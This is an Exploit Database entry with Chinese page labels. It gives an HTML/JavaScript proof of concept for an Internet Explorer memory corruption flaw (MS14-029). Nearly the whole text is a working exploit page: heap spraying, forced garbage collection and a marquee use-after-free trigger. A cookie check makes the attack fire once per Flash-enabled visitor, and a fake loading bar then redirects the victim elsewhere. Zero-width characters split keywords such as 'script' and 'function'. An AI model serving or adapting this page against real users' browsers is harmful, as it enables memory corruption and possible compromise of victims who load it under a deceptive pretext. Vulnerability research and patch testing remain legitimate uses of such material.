Microsoft Internet Explorer – Memory Corruption (PoC) (MS14-029)

• Exploit Database
• 12 阅读

• 作者： PhysicalDrive0
  日期： 2014-08-28
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/34458/

• <!doctype html>
  <html>
  <head>
  <meta http-equiv="Cache-Control" content="no-cache"/>
  <sc​ript >
  func​tion stc()
  {
  var Then = new Date();
  Then.setTime(Then.getTime() + 1000 * 3600 * 24 * 7 );
  document.cookie = "Cookie1=d93kaj3Nja3; expires="+ Then.toGMTString();
  }
  func​tion cid()
  {
  var swf = 0;
  try {
  swf = new ActiveXObject('ShockwaveFlash.ShockwaveFlash'); } catch (e) {
  }
  if (!swf)
  return 0;
  var cookieString = new String(document.cookie);
  if(cookieString.indexOf("d93kaj3Nja3") == -1)
  {stc(); return 1;}else{ return 0;}
  }
  String.prototype.repeat=func​tion (i){return new Array(isNaN(i)?1:++i).join(this);}
  var tpx=un​escape ("%u1414%u1414").repeat(0x60/4-1);
  var ll=new Array();
  for (i=0;i<3333;i++)ll.push(document.create​Element("img"));
  for(i=0;i<3333;i++) ll[i].className=tpx;
  for(i=0;i<3333;i++) ll[i].className="";
  CollectGarbage();
  func​tion b2()
  {
  try{xdd.re​placeNode(document.createTextNode(" "));}catch(exception){}
  try{xdd.outerText='';}catch(exception){}
  CollectGarbage();
  for(i=0;i<3333;i++) ll[i].className=tpx;
  }
  func​tion a1(){
  if (!cid())
  return;
  document.body.contentEditable="true";
  try{xdd.applyElement(document.create​Element("frameset"));}catch(exception){}
  try{document.selection.createRange().select();}catch(exception){}
  }
  </ sc​ript >
  </head>
  <body onload='setTimeout("a1();",2000);' onresize=b2()>
  <marquee id=xdd > </marquee>
  <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="1%" height="1%" id="FE">
  <param name="movie" value="storm.swf" />
  <param name="quality" value="high" />
  <param name="bgcolor" value="#ffffff" />
  <param name="allowScriptAccess" value="sameDomain" />
  <param name="allowFullScreen" value="true" />
  </object>
  </body>
  <body>
  <form name=loading>
  ¡¡<p align=center> <font color="#0066ff" size="2"> Loading....,Please Wait</font> <font color="#0066ff" size="2" face="verdana"> ...</font>
  ¡¡¡¡<input type=text name=chart size=46 style="font-family:verdana; font-weight:bolder; color:#0066ff; background-color:#fef4d9; padding:0px; border-style:none;">
  ¡¡¡¡
  ¡¡¡¡<input type=text name=percent size=47 style="color:#0066ff; text-align:center; border-width:medium; border-style:none;">
  ¡¡¡¡<sc​ript > ¡¡
  var bar=0¡¡
  var line="||"¡¡
  var amount="||"¡¡
  count()¡¡
  func​tion count(){¡¡
  bar=bar+2¡¡
  amount =amount + line¡¡
  document.loading.chart.value=amount¡¡
  document.loading.percent.value=bar+"%"¡¡
  if (bar<99)¡¡
  {setTimeout("count()",500);}¡¡
  else¡¡
  {window.location = "http://www.google.com.hk";}¡¡
  }</ sc​ript >
  ¡¡</p>
  </form>
  <p align="center"> Wart,<a style="text-decoration: none" href="http://www.google.com.hk"> <font color="#FF0000"> kick me</font> </a> .</p>
  </body>
  </html>